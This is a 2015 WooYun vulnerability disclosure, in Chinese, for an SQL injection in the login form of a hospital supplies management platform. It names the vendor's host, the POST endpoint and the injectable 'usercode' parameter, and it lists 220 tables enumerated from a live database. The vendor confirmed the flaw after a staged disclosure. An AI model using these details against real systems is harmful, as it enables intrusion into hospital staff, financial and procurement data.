当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131487

漏洞标题:图特医院物资供应链管理平台SQL注入(30库)

相关厂商:hspcn.net

漏洞作者: wps2015

提交时间:2015-08-04 11:46

修复时间:2015-09-18 12:06

公开时间:2015-09-18 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

还是小厂商?

详细说明:

问题出在http://hspcn.net:8000/home/Account/ 登录处

20.png


paylaod:

POST: hspcn.net:8000/home/Account/ValidateLogOn
data:usercode=fdsf&password=sfsd


参数usercode,共有30个库

21.png


当前库:HOPESHARE_S2YY

Database: HOPESHARE_S2YY
[220 tables]
+-----------------------------+
| BI_INDEX |
| CW_BMFL |
| HSP_SCM_DELIVERY_CHECK |
| HSP_SCM_REPAIR |
| OA_CMS_ARTICLE |
| OA_CMS_ARTICLE2 |
| OA_CMS_ARTICLE_COMMENTS |
| OA_CMS_ARTICLE_KEYWORD |
| OA_CMS_ARTICLE_OTHER_COLUMN |
| OA_CMS_ARTICLE_PERMIT |
| OA_CMS_ARTICLE_TOP |
| OA_CMS_ARTICLE_VC |
| OA_CMS_ARTICLE_VIEWER |
| OA_CMS_ARTICLE_VIEWS |
| OA_CMS_ARTICLE_VISITS |
| OA_CMS_ARTICLE_VOTE |
| OA_CMS_ARTICLE_VOTE_DETAIL |
| OA_CMS_ARTICLE_VOTE_RESULT |
| OA_CMS_COLUMN |
| OA_CMS_COLUMN_PERMIT |
| OA_CMS_VISITS |
| OA_DEPARTMENT_PHONE |
| OA_DIRECTORY |
| OA_DOC_ATTACHMENT |
| OA_EMAIL |
| OA_EMAIL_DETAIL |
| OA_EMAIL_FOLDER |
| OA_GUESTBOOK |
| OA_GUESTBOOK2 |
| OA_LATEST_CONTACT |
| OA_MESSAGE |
| OA_MESSAGE_DETAIL |
| OA_SMS |
| OA_SMS_DETAIL |
| OA_VEHICLE_INFO |
| OA_VEHICLE_USE_LOCK |
| OA_VEHICLE_USE_SITUATION |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PUB_ACCESS |
| PUB_ACCESS_CONTRAST |
| PUB_ACCESS_PARM |
| PUB_ACCESS_SQL |
| PUB_ACCOUNTING_PERIOD |
| PUB_APPLICATION |
| PUB_ATTACHMENTS |
| PUB_ATTACHMENTS_DEL |
| PUB_BLOB |
| PUB_CNCHAR |
| PUB_CNPHRASE |
| PUB_CODE |
| PUB_CODE_CLASS |
| PUB_CODE_CLASS_CONTRAST |
| PUB_CODE_CLASS_ITEM |
| PUB_COLLECT |
| PUB_COLLECT_CONVERT |
| PUB_COLLECT_FILTER |
| PUB_COLLECT_PARM |
| PUB_COL_SHOW |
| PUB_COL_SOLUTION |
| PUB_COL_SOLUTION_DETAIL |
| PUB_CONTENT |
| PUB_CONTRAST_CLASS |
| PUB_CONTRAST_RELATION |
| PUB_DATE |
| PUB_DB_COL |
| PUB_DB_COL_EXTEND |
| PUB_DB_CONNECT |
| PUB_DB_INDEX |
| PUB_DB_OBJ |
| PUB_DB_OBJECT |
| PUB_DB_OBJECT_DEPEND |
| PUB_DB_OBJECT_TYPE |
| PUB_DB_OBJECT_TYPE_DEPEND |
| PUB_DB_OBJ_DEPEND |
| PUB_DB_SYNONYM |
| PUB_DB_TAB |
| PUB_DB_TAB_RELATION |
| PUB_DB_VIEW |
| PUB_DEPARTMENT |
| PUB_DEPARTMENT_ZY |
| PUB_DEPARTMENT_ZY1 |
| PUB_DEVICE |
| PUB_DEVICE_ASSIGN |
| PUB_DEVICE_ASSIGN_PLAN |
| PUB_DEVICE_CHECK_IN |
| PUB_DICTIONARY |
| PUB_DICTIONARY_AD |
| PUB_DICTIONARY_ADBASE |
| PUB_DICTIONARY_ITEM |
| PUB_DICTIONARY_LZ |
| PUB_EMPLOYEE |
| PUB_EXCEL_IMPORT_DETAIL |
| PUB_EXCEL_IMPORT_SOLUTION |
| PUB_FP_SAMPLE |
| PUB_FUNCTION |
| PUB_FUNCTION_INTERFACE |
| PUB_FUNCTION_OPERATION |
| PUB_GROUP |
| PUB_GROUP_MEMBER |
| PUB_GROUP_PERMIT |
| PUB_HOSPITAL |
| PUB_HOSPITAL_AREA |
| PUB_IDICT |
| PUB_IDICT_ITEM |
| PUB_INTERFACE_ICD10 |
| PUB_INTERFACE_SSMZK |
| PUB_LOG_BIZ |
| PUB_LOG_BIZ_DEL |
| PUB_LOG_ERROR |
| PUB_LOG_LOGIN |
| PUB_LOG_MENU |
| PUB_LOG_MODIFY |
| PUB_LOG_OPERATION |
| PUB_LOG_SQL |
| PUB_LOG_SQL_HISTORY |
| PUB_MENU |
| PUB_MENU_OPERATION |
| PUB_OPERATION |
| PUB_PACKAGE |
| PUB_PACKAGE_FUNCTION |
| PUB_PACKAGE_REG |
| PUB_PARM |
| PUB_PARM_FUNCTION |
| PUB_PARM_INSTANCE |
| PUB_PARM_OBJECT_SCOPE |
| PUB_PARM_OBJECT_TYPE |
| PUB_PARM_PACKAGE_ITEM |
| PUB_PARM_PACKAGE_VAL |
| PUB_PERMIT |
| PUB_PERMIT_DETAIL |
| PUB_PERMIT_SOLUTION |
| PUB_PERMIT_SOLUTION_FUNC |
| PUB_PERMIT_SOLUTION_OBJECT |
| PUB_PERMIT_SOLUTION_UNIT |
| PUB_PERMIT_SOLUTION_UNIT_OP |
| PUB_REMIND |
| PUB_REMIND_CLASS |
| PUB_REPERMIT |
| PUB_REPERMIT_DETAIL |
| PUB_REPORT |
| PUB_SEQUENCE |
| PUB_SHARE_RECEIVE |
| PUB_SHARE_SEND |
| PUB_SUBSET |
| PUB_SUBSET_DETAIL |
| PUB_SUBSET_GROUP |
| PUB_SYSTEM |
| PUB_TASK |
| PUB_TASK_CLASS |
| PUB_TASK_ITEM |
| PUB_TASK_LOG |
| PUB_TASK_LOGS |
| PUB_TASK_PLAN |
| PUB_TREE_DEF |
| PUB_TREE_DEF_ITEM |
| PUB_USER |
| PUB_USER_FAVORITE |
| PUB_USER_PERMIT |
| PUB_USER_REPERMIT |
| PUB_WEBPART |
| SCM_ACCOUNT |
| SCM_ASK_BUDGET_PRODUCT |
| SCM_ASK_PURCHASE_PRODUCT |
| SCM_ASSETS |
| SCM_ASSETS_CHECK |
| SCM_BILL_SIGN |
| SCM_BILL_SIGNS |
| SCM_BIZ |
| SCM_CERT |
| SCM_CERT_OLD_RELATION |
| SCM_CERT_PRODUCT |
| SCM_COMPANY |
| SCM_COMPANY_USER |
| SCM_DELIVERY_CHECK |
| SCM_FINANCE_BIZ |
| SCM_FINANCE_PARMS |
| SCM_HIS_MEDICAL_SH |
| SCM_HIS_MEDICAL_SH_N |
| SCM_INVOICE |
| SCM_INVOICE_BILLS |
| SCM_PATROL |
| SCM_PATROLS |
| SCM_PAYMENT |
| SCM_PAYMENTS |
| SCM_PAYMENTV_BQHZT |
| SCM_PAYMENT_BALANCEP |
| SCM_PORT_DEPT_ORDER |
| SCM_PORT_ORDER_PACKAGE |
| SCM_PORT_ORDER_PACKAGES |
| SCM_POSITION |
| SCM_PRODUCT_APPLY |
| SCM_PRODUCT_APPLYP |
| SCM_PRODUCT_APPLYS |
| SCM_PRODUCT_AUTHO |
| SCM_PRODUCT_CLASS |
| SCM_PRODUCT_NAME |
| SCM_PRODUCT_PRODUCE |
| SCM_PRODUCT_SPEC |
| SCM_PRODUCT_USE |
| SCM_PRODUCT_USES |
| SCM_PURCHASE |
| SCM_PURCHASES |
| SCM_PURCHASE_DELIVERYS |
| SCM_REPAIR |
| SCM_REPAIR_EVALUATE |
| SCM_REPAIR_PROESS |
| SCM_REPAIR_STATE |
| SCM_REQ_BUYS |
| SCM_STOCK |
| SCM_STOCK_DEPT |
| SCM_STOCK_IN |
| SCM_STOCK_INS |
| SCM_STORE |
| SCM_STORE_ACCOUNT |
| SMS_ACCEPT |
| SMS_SEND |
+-----------------------------+


是可以dump数据库的

22.png


漏洞证明:

22.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-04 12:06

厂商回复:

跟之前其他白帽子提过的问题差不多,正在统一处理中。

最新状态:

暂无


漏洞评价:

评论